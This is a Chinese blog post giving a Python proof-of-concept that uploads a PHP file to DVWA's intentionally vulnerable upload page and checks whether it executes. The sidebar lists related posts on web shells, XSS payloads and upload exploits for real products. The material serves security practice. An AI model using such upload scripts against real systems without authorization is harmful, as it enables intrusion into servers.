python poc1---DVWA文件上传[low]

最新推荐文章于 2024-04-17 12:32:54 发布
最新推荐文章于 2024-04-17 12:32:54 发布
阅读量259 收藏 3
点赞数
分类专栏: poc 文章标签: python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43152809/article/details/129162816
版权 
# -*- coding: utf-8 -*-
"""
@Time : 2023/2/22 14:05
@Auth : aur02a
@File :文件上传poc.py
@IDE :PyCharm
@Motto:还未老,想养老,小小年纪,苦恼苦恼
"""
# coding=utf-8

import requests


def glfusion_upload(url):
    path = "/DVWA-master/vulnerabilities/upload/"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Cookie": "security=low; PHPSESSID=0pe5ne7co5mn6nncfj020bhtq1",
        "Content-Type": "text/html;charset=utf-8"
    }


    files = {
        "MAX_FILE_SIZE": (None, "100000"),
        "uploaded": ("phpinfo.php", "<?php phpinfo();?>"),
        "Upload": (None, "Upload")
        }
# 根据抓包结果写成列表
    resp = requests.post(url + path, headers=headers, files=files)
    print(resp.status_code)

    poc_path = "/DVWA-master/hackable/uploads/phpinfo.php"
    resp2 = requests.post(url+poc_path)
    if "PHP Version" in resp2.text:
        print("[+]", url, "存在文件上传漏洞")
    else:
        print("[-]", url, "未发现文件上传漏洞")


if "__main__" == __name__:

    url = input('输入需要检测的url:')
    glfusion_upload(url)

在这里插入图片描述
运行结果:
在这里插入图片描述

aur03a
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入pythonpoc_DVWA SQL-injection 附python脚本
weixin_39896256的博客
12-17 376
SQL-Injectionlow等级首先我们将dvwa等级调到low 如图接下来选择SQL Injection,并在提交框中输入正常值1,查看返回结果接下来检测是否存在注入,分别输入 1' and 1=1 1' and 1=2 当我们输入1' and 1=1时,发现报错页面,提示我们语句没有闭合,所以我们输入1' and '1'='1和 1' and '1'='2得到如上回显信息说明存在注入...
使用 Python 编写文件上传漏洞Poc
soldi_er的博客
01-07 5092
文章目录前言调试过程人工上传的请求数据构造请求头构造请求的文件字典调试最新上传脚本 前言 之前写过文件上传相关的利用脚本,但是一直不太明白,也遗憾AWD攻防时没用到自动文件上传木马。审计到一个文件上传漏洞,刚好要编写Poc,所以花点时间写一个小本。 参考: PHP_Session文件上传利用:文件包含 网络爬虫-使用requests上传multipart/form-data格式文件 调试过程 人工上传的请求数据 POST /glfusion-1.7.9/public_html/admin/plugins
H3C CVM 前台任意文件上传漏洞(含批量验证poc)(1),2024年最新你想学的都在这里
最新发布
2401_83947194的博客
04-17 300
可以走的很快,但一群人才能走的更远!当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。最后就是大家最关心的网络安全面试题板块。
文件上传的多种利用方式
tomyyyyy
03-22 2236
文件上传的多种利用方式 文件上传漏洞除了可以通过绕过检测进行webshell的上传之外,还有多种其它的漏洞可以进行测试。 XSS漏洞 文件名造成的XSS 当上传任何文件时,文件名肯定是会反显示在网页上,可以使用 XSS Payload做文件名尝试将其上传到 Web 应用程序。这样就可能会触发XSS。 抓包修改文件名为如下所示的名字 <img src=x onerror=alert(1)&g...
文件上传漏洞—简单利用(墨者学院靶场)
weixin_44431280的博客
02-24 2013
文件上传漏洞—简单利用(墨者学院靶场) 说明:文章中涉及的网站信息皆是墨者学院靶场环境,不涉及互联网真实环境,仅供学习。 信息收集: 访问目标靶场地址,得到如下界面,根据google插件Aappalyzer判断目标靶场信息: Web容器:Apache 脚本语言:PHP 操作系统:Ubuntu(linux) 测试过程: 1,根据功能点判断此处可能存在文件上传漏洞,尝试上传扩展名为txt和php的文件,发现扩展名为txt的文件可以正常上传,但是php后缀的文件上传失败 2,上传文件poc.txt,使用Bur
MS17-010 python poc
03-23
MS17-010 python poc,MS17-010 python pocMS17-010 python pocMS17-010 python poc
common-python-lib-poc
03-21
通用python-lib-poc
POC-T:渗透测试插件化并发框架
04-06
特色支持多线程/ Gevent两种并发模式极简式脚本编写,无需参考文档内置脚本扩展及常用PoC函数支持第三方搜索引擎API(已完成ZoomEye / Shodan / Google / Fofa免费版)依赖Python 2.7 点子用户手册其他联系作者邮件...
poc-route-autoload
04-29
路线自动加载 本文的概念证明:
poc-resize-images:在客户端调整图像大小
04-28
POC文件API 打开fileapi.html 我们可以通过裁剪来发送几个文件 局限性 我们在上传上是异步的,因此我们粉碎了浏览器资源 POC Dropzone 打开dropzone.html 您可以发送多个文件 局限性 我们在裁剪方面是异步的,...
python DVWA文件上传POC练习
weixin_56537388的博客
09-10 234
这里需要将内容变成这种格式的请求头,这里可以用笨方法一个一个改,但是这里是可以通过python的正则表达式来提高我们的效率的。这里先选择低难度的文件上传,低难度的是没有任何过滤可以直接上传的,先上传一个php一句话木马,使用burpsuite抓包。在头部信息里其实只要UA信息就可以了,cookie和accept可以要也可以不要,可以自己慢慢修改。首先,构造POC我们首先要明白漏洞利用的流程,然后要知道请求包的格式,然后才能针对性的POC。这里按照下面的步骤,如果要求不同选择其他正则表达式即可。
文件上传漏洞靶场upload-labs学习(pass16-pass21)
AFCC_的博客(Web_Dog)
03-19 3909
Upload-Labs关卡0x00 Pass16(exif_imagetype函数绕过)环境准备exif_imagetype函数0x01 Pass17(二次渲染绕过)move_uploaded_file函数imagecreatefromjpeg、imagecreatefrompng、imagecreatefromgif函数imagejpeg、imagepng、imagegif函数过关思路GIF文件插入payloadpng、jpg文件插入payload0x02 Pass18(条件竞争绕过)抓取上传数据包抓取访
Pocsuite编写ActiveMQ任意文件上传漏洞脚本
qq_40997679的博客
10-07 398
想了解更多Pocsuite脚本、请关注微信公众号【白猫学安全】
文件上传漏洞—简单利用2(墨者学院靶场)
weixin_44431280的博客
03-01 893
文件上传漏洞—简单利用(墨者学院靶场) 说明:文章中涉及的网站信息皆是墨者学院靶场环境,不涉及互联网真实环境,仅供学习。 上传思路: 步骤一:判断网站支持文件格式。从网站功能点或者题目说明可以判断处,该功能点支持上传图片格式(JPG,GIF和PNG等)文件 尝试上传文件名为poc.jpg和poc.php的图片:判断网站支持JPG格式文件上传 poc.jpg格式上传成功: poc.php格式上传失败: 步骤二:猜测网站拦截方式(前端JS/MIME类型/文件扩展名/黑白名单/文件内容检测/) JS前端,MI
Tomcat任意文件上传(CVE-2017-12615)漏洞复现(附POC
byt8563的博客
06-30 3609
欢迎使用Markdown编辑器 • 漏洞名称:Tomcat任意文件上传漏洞 • 漏洞编号:CVE-2017-12615 • 漏洞影响:上传包含任意代码的文件,并被服务器执行。 • 影响平台:Windows • 影响版本:Apache Tomcat 7.0.0 - 7.0.81 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: 全新的界面设计 ,将会带来全新的写作体验; 在创作中心设置你喜爱的代码高亮样式,
POCO 表单形式文件上传
陈海峰的博客
09-19 2751
HTTPRequest request(HTTPRequest::HTTP_POST, "/fileupload/upload_file.php", HTTPMessage::HTTP_1_1); HTMLForm form; form.setEncoding(HTMLForm::ENCODING_MULTIPART); form.set("entry1", "val
金山终端安全系统任意文件上传漏洞附poc(新鲜趁热)
S_yd1的博客
04-10 2190
金山终端安全系统任意文件上传漏洞附poc(新鲜趁热) 来,直接上手,引擎走一波 fofa网址:fofa.so fofa搜索:title=“金山终端安全” 存在漏洞,上传成功 shell地址,url/Uploaddir/上传文件名称: poc: import requests headers = { "Content-Type":"multipart/form-data;boundary=----WebKitFormBoundaryhQcaKJIKAnejKGru" } payload = '''--
phpcms_V9任意文件上传poc
soldier_wing的博客
06-30 1430
使用方法:先编译 javac -encoding UTF-8 Main.java 然后运行 java Main URL(http://www.xxxx.com) import java.io.BufferedReader; import java.io.IOException; import java.io.InputStreamReader; import java.io.OutputStream
poc-yaml-thinkphp5023-method-rce poc1
07-29
通过 poc1 工具,攻击者可以利用 YAML 文件解析的漏洞,实现远程代码执行。攻击者通过构造恶意 YAML 文件,并将其作为参数发送给目标应用的接口,从而触发代码执行。 该漏洞的危害性很高,攻击者可以在受影响的应用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值